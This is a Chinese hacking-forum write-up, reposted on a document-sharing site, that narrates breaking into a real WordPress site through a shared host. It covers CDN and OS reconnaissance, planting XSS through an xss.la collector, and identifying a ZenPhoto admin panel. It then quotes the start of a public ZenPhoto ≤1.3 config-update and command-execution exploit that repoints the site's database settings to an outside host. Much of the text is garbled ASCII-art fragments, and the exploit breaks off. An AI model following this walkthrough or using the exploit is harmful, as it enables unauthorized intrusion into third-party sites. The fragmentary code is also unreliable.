[法客周年庆]无尽的提权

《[法客周年庆]无尽的提权》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、《边干边写---重要的是思路》由于一直在忙工作，很久很久没写东西了，但是为了法克周年庆。（庆祝杨凡被爆菊花三周年纪念日）还是写一篇吧。很多好的文章由于一些原因不能写出来。大家将就下。而且本人有拖延症。我敢说，我弄下之后就会懒得写文章。所以边日边写吧；D收集了下目标信息。神器WhatWeb看到的Wordpress的而且版本略高。切由于工作性质特殊。估计直接从插件下手的机会不大。果断决定从旁注入手先分析一下目标的操作系统和是否有CDN。先分享下我探测目标是否有Cdn的方法。http://www.webkaka.com/webCheck.aspx

2、在这个地方给网站测速。可以显示各地的机房ping目标的ip。（打码真累）了解cdn的同学一看就知道了。99%是没有的。估计是国外的虚拟主机。或者服务器。这样的话。至少知道在同一台机器上了。可以开始看看旁注。运气好的话是可以把目标干下来的。探测目标操作系统的方法也很简单。大小写。大家都懂的在旁注一站点上看到了这样一个页面。然后决定先打个xss进去看看这里用的端是xss.la的wooyun有号的朋友可以在wooyun集市里购花50WB购买邀请码这里只是写个思路。不一定会成功。看到这里，能看出来是一个老外给自己的儿子搞的网站（老外真欢乐）。继续看

3、能不能找到这套系统的资料然后进一步下手。在域名后面加个/admin跳转到了这个地方。从这里可以看到。这套系统叫做ZenPhoto。把admin.php换成admin.phP后发现文件不存在。从这里可以知道。目标系统非windows奉献给搞国外站的基友们一个和exploit-db类似的网站"http://www.exploitsdownload.com"查询下看看有没有神马漏洞。这种时候要是能找到目标用的程序的版本。会更加的方便查询后看到这样一个exp

4、/

5、/__/

6、

7、

8、

9、_

10、/

11、

12、

13、

14、/

15、

16、

17、

18、

19、

20、_)

21、

22、

23、/

24、

25、

26、

27、

28、//\

29、

30、

31、

32、_<

33、

34、

35、

36、

37、__

38、/____

39、__

40、

41、

42、_)

43、

44、_

45、

46、_

47、____/_/_____/

48、____/http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/AbysssecIncPublicAdvisoryTitle:ZenphotoConfigUpdateandCommandExecuteVulnerabilityAffectedVersion:Zenpho

49、to<=1.3Discovery:www.abysssec.comVendor:http://www.zenphoto.org*/$path="http://www.site.com/zenphoto"."/"."zp-core/setup.php";$new_mysql_user="abysssec";$new_mysql_pass="absssec";$new_mysql_host="abysssec.com";$new_mysql_database="abysssec_database";$new_mysql_prefix="zp_"

50、;echo"";echo"ZenPhotoImageGallery1.3ResetadminPassword
By:Abysssec@Inc
www.Abysssec.com